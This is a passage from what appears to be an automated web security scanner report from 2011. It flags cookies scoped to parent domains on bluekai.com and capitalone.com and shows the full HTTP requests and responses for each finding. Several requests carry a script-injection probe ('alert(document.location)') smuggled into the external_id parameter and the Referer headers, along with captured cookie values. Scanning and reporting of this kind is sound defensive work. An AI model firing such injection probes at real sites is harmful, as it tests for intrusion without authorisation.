Set-Cookie: bkst=KJhBAn2gNWWxhqz/snyzWxxqHupuqopj74taCRxAcYjz8/CQDrfm4gIQy3kaevHmgfSoqnxPguVxd9DtRoku6NAJ6zqjLXkVy8Lwfft5m4Uk3oJlIF7fKWT50f0AQitIxWTbKhz6Jj56jYv5QtcsbGph85teFXv4Yc2afDt4EjdFEpILBKk6jCcfTM3qVDKqguqZgswBxR4K5Bxkf0Z0I5xiFNbtInwzncbJ5aNau+8jXeRjjTNpW4prbpBjny8STq4lspGKBBuuOlY9comhAuyipFdX/KFexu+e+D/GccVUx+s/AqV+cK+x/MrVY/Z8mdFdKIaF3+VP2KlNgDzwd5gM0Kgn6Dc54pc3K4H6LbTzpHG1adb7siO6CoyO3VACrL7184jx3xDPUdsEFz7sKs57Rd4sgUwHFTkIHbsJ+GHA9Y6Q91ikvyvnpnTl8/z4ZX48LeVF0Kzx351h9VGv+5moPo7bCJZnHR5WF0IWFl4+6C740slI9VrbKQA=; expires=Wed, 14-Dec-2011 12:33:36 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 12:33:36 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

9.10. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=tjN2bLOLq2Sd8JkA; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWa/asWDOded8sbgkCraani0OJ3hjPLHOYDD6AWvkATgKpYAv9FFugHvi7HHCnSGxvHnbWVGjW2NYJH9m7GvCqoAAgY/ShugRFEKEkXfdlKRsU8XfdIIqtSIZKyIT12KeyFJ7PxWN8WPlI6cIzxj5LvTBzqrYgsgyW8vd+Uk7PxP/MQQUF6B81uKNvZF7VBgwt4BEX4X2K8OH2kEhLUf/O5rLVBctc7JUpN5bEXfYsy74EX19bV1gecQfCYfvI9Vmu8Jd+YwgPxYbqYbLfqifuCyRXkeFqQE08TbR80VI3YNFfwtuddg5h0aX7ybfghVJIBEcAggVlJdXqn4MRvL2zfpLrQlezYXVBKF4ZtL2zTp17zIeXxl467IxNE52Gi+2zbfWSY8OfC0hXIgZT0NlMALIDXpyvnA7EXSe600KTtcJ2iEn2Qgp2igE2k4MeXqBp8Ccpur1yTjjlwLF7atzRH2+ob+pXF8gUCCEgfHQYK1MpSpBKIzt9I157LGaYrIatwlssFKISSzUGTOlpq644FVzK43srYgf/IEblb2Kgi4wVuLKK47XFm/g7CGqPpffNgMDlctE2k4xVXSaT64UsHUs8zrLeK1FhF7pg14sIF2m54/IlQFIdByyn5ctmNeqn6bhIPfpCpp0/DVc+487wXYrchQyy==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bko=KJ0ETtBQucUXfzF11/ZBQVsYdV24UGRZeQRsEdl4FAy1WfkCnsVQfcs2lfb1evK8Rvy5yC9VWT13nTxk0meBYhBECfnTsV/a/uhZCgwzWORnxpQf6af8U6OE5/YZdcMlWXQ3a/uTCRkOM8ZOTKv7gfbze9h91u6Qi8cCe+9XcjZUxnNhxC9VW61iP/0P/H2GcFmn86ONYEy1ecaw7Qa+6TvpnFaeVWeqKsWLuSewlyU49Lgv9kAOsbXeExR9WE2s4x==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
bkw5=KJ0akaN/DtWRhddcGp7wp9pXiOjHARjpS6L7nis5hrRTtl9UxxVHtjj52xDa6RGIMmG09k5K5eP0xUxHCGH/WAH6sHEHgVWUxPaSHa4VX8plMw4xl+cQwsKzldmXpdzfNQq9PzHgKFUiSiKQ/K4tKRYLQ6HyluR5xVePu8I1/kRNGOkcRAp3MnZfxJKkPxedBnp+jPkMqngpnl77/WLIRviri1B6t7qXbQJ6mynCnK4tOkPSc1tEu8U/MWKgxcquSDd2/QmeUksXf8/j29VWeVz2Q/DKGWRHM49LFJHqknpTbqksjW/clmi6iqziTEwPCwtGuD4a60ocyBZLfUqtTbE5M8KwQ9XCIAxtw3oSmTbcojXqwRJyo+lTaoS7lU/xcfTbqsSJh/iX3uDa2mXVhB1v+/V8qkBGgyn3zzGW3ocUF8BsUF2+uPz4ud2ZeHttn7K0OK5/+TgbBUiapMu0W6YZMdNwTu4hHQxstW+KUhTcMM7/mr000x3HWyfuQYsqL1dEeg/KOtl0QtpmmWQE2+rWRffG/1t/tTEpKnhcNMmWMdt0SMzMywis/gJVep8cjB2KHsx2TpQ6vs6ZG20h9rSgr9R+vH7NukESZJiw0V7nh1uWzZyqX40dCm5xEUQmNRuM4CDEBXRpBfNyBiSM7C6VDlYqqnjC5aCmQu+mEdtDkDIl0qkBTye2UtBworiiSzG5YbcVPBXH8P3kqBuWLNWEpZRL/qvJDYQsPA686TLJzUL66VLF8Cn02+iUavzNfr9/Q6kN7mPSoEMPCmBDWTfpENnLOk4BMzDA0fpI053QXZtbRWZr35QY155i0dvbLzu0QKH/uZudHK58e3jAn21VvPiAsQccOe8AGANq1V3RE/ZbXJjKcCcHzdIl/oWV+0glwI4IzoEkX7ZVeppLjjgAw5rY+XSn6qubArPSoD330Rp08a/kfNrAR1NYvpvVppoeTfP0lePd9jrOJTD=; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2939?ret=html&phint=keywords%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&phint=__bk_t%3DPoints%20Rewards%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&limit=4&r=50781410 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bklc=4dfb282e; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UbZ22LUv1790oYUsJIj/LBQjsOGSsO3SsoGSVHrRsaZjsCAjQ/AeY6BnxhQikZ9iGkHYyYfRHok; bko=KJ0ETtBQZsedt8KHGRZeQzaEdfzFWXBWqCCgWC+Wko5OszQbgQ5u58Gnh+GCesWh1SM0xkiYeBbX1eaNv/r4/PRxyZJZm1LBRqWyCn1p1vEvdyvSGQ168zKf76OV/Pe5hD24Quy2jQinATWOvvRaagLeBW2c8iPxq8yxC1UWA9QPRtU/O8gcdm/8Da6YeyBelJB7xBr6TvhndO9V6ejKsWLubwBlyqK9LgJ9PLesb6YE9q7tHfG=; bkst=KJhBAnNn96WxhqzxaJmQ/BQGRZsfmgw4iTVWs9vHvWcOonpqFx1PGCRhRstF+FqVGgPPdQ/qLqED5aSYtMQUsbzSlFLhfpWEfcsS6xy4UkGEqWMfY7B83MmjOm8A/gAv/KWrJoqqUsx3XXRGaXH2yEXHwX7bFSwKXSelF4oe6Q5JzXyoqfxW/flxDZM+ycxFUXZKvHPoNhLatiGP3axsx91S2W/bJHahbFtBf/+uDDqaYeRBMZ4KoCpHOu8MagCBU5YO/iCZqPpIkFQaP3FV5IFqKp+Zzf25mttzhXaJ/yIBybNRFHAl3JEdDQDGNWJo9PHEQ+w+XjVkYZBk8LfYxqd5qcDbpKfXTGM6j2vUsxG7DILaG9xWQOuuiOO/eiRU0kEriCrMu+WXKoBRopnrwYOUBZqzh6CqfMWJ3DuBu7NIWqXIIIIBPduqU6DWjfz=; bk=eC9VwtORjebd8JkA; bkc=KJh566+/sNWDOrOdt3xI3CsnVsQAYwPOgvSvDvCYifixagv1jva/ullQUiksDjara1aDPOeoo+iBT/mLtGVQYmnuPqaxBp8xYs/Lukx37owhZMk71EBXlww4N2yqKxyW3GcFqbIeaG9XXrWaWcUT4SN6i0F+Yw7ZARUBycUxMSSDmlLCUaW+fPKr2Wopd6TdCwxwgplKQpFwv0zIxpMID5gfPeosIUzF6I+jsxYr9gRclD90EcFizJ+nrLUC17gKDwfJ6VUxM8Yqlj052oDcSBthDWOrhCIncPRmDqlElnXh2hKbbbXzX5HTls8X7WF+XhSuJ8K6wkdvw6zCpwUsbpEooV49mo77pN8D87gMOHGfaQBXjIKDUdVybf2/zflhdy0Qo9BGqn4pfm4vUsdLoFpV9gOBKK1B84T8bVfkTP7orH7odu7oy67oFX3dkRrIurzg803fkYBHbj8hbzu/5WtOBmIUXEJ8zTlrZ1mp0LDk6oyl2rz9Gt6VTGZ6rfpucz3zBd89gt2MyBTodtdqlsbzZxUL6FkTzVnULT5foRKDmVXXEj44LtICLrMTl+7vPEfo4luI7e8EEiMlNDk7vi54u8X3c0CcU6kwvwwbMnwG4d0iXN7GXvzHbRRCS4TSIIQIC6L+TUijqm4hMsXOmxOQ59==; bkw5=KJhNkW+GWNWDCFdoVJ+1S3lxChQHaP+JZoiRoexsqsmkSzAeLheDMqDZNoDFDOYMIviGuhWSpzJP1OcWCPuvaBsBaJKY/ZTg5uWGVCPhaEN7fGxfZJ+9pGHX82fp72512xayPwsScAmTmQOGvnCXqiOF/laz+TQ7YBuX2J5HHD6er7WAyzHonByax3jUs4pHXcS/qSrhXzfd8JtBnwr9DVzPCIZtq4Q597HnQRCVzcZevi2VXIHu1pn7No3xcUEqDfd/yvecsBbcj9ShQeMeVRdQ8uex3k9M/GLGMu43D4p6FDjAHQ5zsnY/+07Cm2VWTbiJoIk+gsOBtafNANqPUp6YwAEGnpgMG2g6TlCDl7jMDOemJThFDEAH+tpWCbIt1dBWWAEK+JWeC7zJTrTaI3Jz7HnbVTOt7WGY3NeDF8BcD42MVAK1gUIEOGdk0dl3yE70qSsrfnkY5hg8su9UTdQkdYnKiz9/H073v2w91H+ji86VIDcAC/N6RBxicwm6MSpe/RFXoeB7qvxnO0pYZidSuezZn1J8wBT+bh7Ohtaj+j+hRco2aUZpO8dMLMrpR20U1oblzvR2sSA+kh9phUWtTWPYEGbSXmuGYDImZgYYhRERXVzrKrOLx33Kchz5FDN7+ZJ0UcqD1Dc42ovomopAeYGTun2UVN1ZmoJ103t/GYtolrosglGtSLnj39k718DutzHJiGaSDLf7DAgLKhz22Z/CJ4524NgzNgZ5axqESotBU7V5SL/bNRHNdAtnmKK3rqYDjkFDw87q6nQja6pnBHDEnVjDqWhHB8qj5oeBjMMf1MqgFs1Otpx2jvJPEYDSjM1iK2bg0drWHrf0a3u0TZlcUubTFChkrlvKfx1lSbIxFVK5Te7lRMvggkKMPfNKSMv7FnkKgdLZvjL5f6UmMmA6BaTTt2FCcf+hssW=; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:29 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=tjN2bLOLq2Sd8JkA; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5NWa/asWDOded8sbgkCraani0OJ3hjPLHOYDD6AWvkATgKpYAv9FFugHvi7HHCnSGxvHnbWVGjW2NYJH9m7GvCqoAAgY/ShugRFEKEkXfdlKRsU8XfdIIqtSIZKyIT12KeyFJ7PxWN8WPlI6cIzxj5LvTBzqrYgsgyW8vd+Uk7PxP/MQQUF6B81uKNvZF7VBgwt4BEX4X2K8OH2kEhLUf/O5rLVBctc7JUpN5bEXfYsy74EX19bV1gecQfCYfvI9Vmu8Jd+YwgPxYbqYbLfqifuCyRXkeFqQE08TbR80VI3YNFfwtuddg5h0aX7ybfghVJIBEcAggVlJdXqn4MRvL2zfpLrQlezYXVBKF4ZtL2zTp17zIeXxl467IxNE52Gi+2zbfWSY8OfC0hXIgZT0NlMALIDXpyvnA7EXSe600KTtcJ2iEn2Qgp2igE2k4MeXqBp8Ccpur1yTjjlwLF7atzRH2+ob+pXF8gUCCEgfHQYK1MpSpBKIzt9I157LGaYrIatwlssFKISSzUGTOlpq644FVzK43srYgf/IEblb2Kgi4wVuLKK47XFm/g7CGqPpffNgMDlctE2k4xVXSaT64UsHUs8zrLeK1FhF7pg14sIF2m54/IlQFIdByyn5ctmNeqn6bhIPfpCpp0/DVc+487wXYrchQyy==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0ETtBQucUXfzF11/ZBQVsYdV24UGRZeQRsEdl4FAy1WfkCnsVQfcs2lfb1evK8Rvy5yC9VWT13nTxk0meBYhBECfnTsV/a/uhZCgwzWORnxpQf6af8U6OE5/YZdcMlWXQ3a/uTCRkOM8ZOTKv7gfbze9h91u6Qi8cCe+9XcjZUxnNhxC9VW61iP/0P/H2GcFmn86ONYEy1ecaw7Qa+6TvpnFaeVWeqKsWLuSewlyU49Lgv9kAOsbXeExR9WE2s4x==; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJ0akaN/DtWRhddcGp7wp9pXiOjHARjpS6L7nis5hrRTtl9UxxVHtjj52xDa6RGIMmG09k5K5eP0xUxHCGH/WAH6sHEHgVWUxPaSHa4VX8plMw4xl+cQwsKzldmXpdzfNQq9PzHgKFUiSiKQ/K4tKRYLQ6HyluR5xVePu8I1/kRNGOkcRAp3MnZfxJKkPxedBnp+jPkMqngpnl77/WLIRviri1B6t7qXbQJ6mynCnK4tOkPSc1tEu8U/MWKgxcquSDd2/QmeUksXf8/j29VWeVz2Q/DKGWRHM49LFJHqknpTbqksjW/clmi6iqziTEwPCwtGuD4a60ocyBZLfUqtTbE5M8KwQ9XCIAxtw3oSmTbcojXqwRJyo+lTaoS7lU/xcfTbqsSJh/iX3uDa2mXVhB1v+/V8qkBGgyn3zzGW3ocUF8BsUF2+uPz4ud2ZeHttn7K0OK5/+TgbBUiapMu0W6YZMdNwTu4hHQxstW+KUhTcMM7/mr000x3HWyfuQYsqL1dEeg/KOtl0QtpmmWQE2+rWRffG/1t/tTEpKnhcNMmWMdt0SMzMywis/gJVep8cjB2KHsx2TpQ6vs6ZG20h9rSgr9R+vH7NukESZJiw0V7nh1uWzZyqX40dCm5xEUQmNRuM4CDEBXRpBfNyBiSM7C6VDlYqqnjC5aCmQu+mEdtDkDIl0qkBTye2UtBworiiSzG5YbcVPBXH8P3kqBuWLNWEpZRL/qvJDYQsPA686TLJzUL66VLF8Cn02+iUavzNfr9/Q6kN7mPSoEMPCmBDWTfpENnLOk4BMzDA0fpI053QXZtbRWZr35QY155i0dvbLzu0QKH/uZudHK58e3jAn21VvPiAsQccOe8AGANq1V3RE/ZbXJjKcCcHzdIl/oWV+0glwI4IzoEkX7ZVeppLjjgAw5rY+XSn6qubArPSoD330Rp08a/kfNrAR1NYvpvVppoeTfP0lePd9jrOJTD=; expires=Wed, 14-Dec-2011 11:58:29 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 11:58:29 GMT; path=/; domain=.bluekai.com
BK-Server: c5b
Content-Length: 321
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BKPGGMMSBV2&t=2&rnd=1821373188" width=1 height=1 border=0 alt="">
<img src="http://ad.yiel
...[SNIP]...

9.11. http://www.capitalone.com/css/global/portal_base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=29FB6279666D0428; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_base.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=29FB6279666D0428; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5294
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.co
...[SNIP]...

9.12. http://www.capitalone.com/css/global/portal_common.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_common.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=A0443C7AC9C03A80; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_common.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=A0443C7AC9C03A80; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 11 May 2011 14:14:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 27261
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Common Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com

...[SNIP]...

9.13. http://www.capitalone.com/css/global/portal_grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_grid.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=36A4741F4351C1C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_grid.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=36A4741F4351C1C5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 8218
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
www.capitalone.com Grid Style Sheet - Based on 960.gs
version: 1.0
author: Daniel Cottner
e-mail: daniel.cot
...[SNIP]...

9.14. http://www.capitalone.com/css/global/portal_print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/global/portal_print.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=6BEC44E31BF1D852; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/global/portal_print.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=6BEC44E31BF1D852; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 11 May 2011 14:14:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9601
Content-Type: text/css
Set-Cookie: BIGipServerpl_capitalone.com_80=828974346.29215.0000; path=/

/*-----------------------------------------------------------------------------
Capital One Print Style Sheet
version: 1.0
author: James Steincamp
e-mail: james.steincamp@capitalone.com
-
...[SNIP]...

9.15. http://www.capitalone.com/css/page-type/portal_landing-accordion.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/page-type/portal_landing-accordion.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=3356A9F2A6EF7136; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/page-type/portal_landing-accordion.css HTTP/1.1
Host: www.capitalone.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/smallbusiness/cards/venture-for-business/?ProductCode=SB5&external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a%27%3balert(document.location)//fd5f10cff0
Cookie: Regionalization=59fcb7b0C0pNz8zPi%2FNLLAFSiTk1AA%3D%3D; caponesn=60d4bfaeC0pNz8zPiyu2srBS8kssAbITc5Ss4%2FLy81JrkhMLgFRyMlDWyMxKydHNzcrIwMDCwMTASLck3cBQ18jA0NDAzMASqMHQ1NTAEgA%3D; SmallBusiness=a44aa3f2cy4tLsnPTS0KTk3PTc0riXNJTUsszSmpCUktLnFOzcmJMzCq8fF38gWKZQanFhdn5uc555cCFRrWOEO1ulYUpBZlpuYlp8J1A3V45qEpBwA%3D; external_id=GAN_1000002114_SBCGAN_j31125666k112308_6315282511040a'; portal_caponecc=7d2941e5qygwjIuvKUktLkkvyi8tiCtJNzDUMjIwNDQwM7CsSc5IzMtLzYlzdHMDChpYGJgYGNUAAA%3D%3D

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:33 GMT
Server: Apache
Set-Cookie: v1st=3356A9F2A6EF7136; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Wed, 16 Mar 2011 13:22:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 2555
Content-Type: text/css
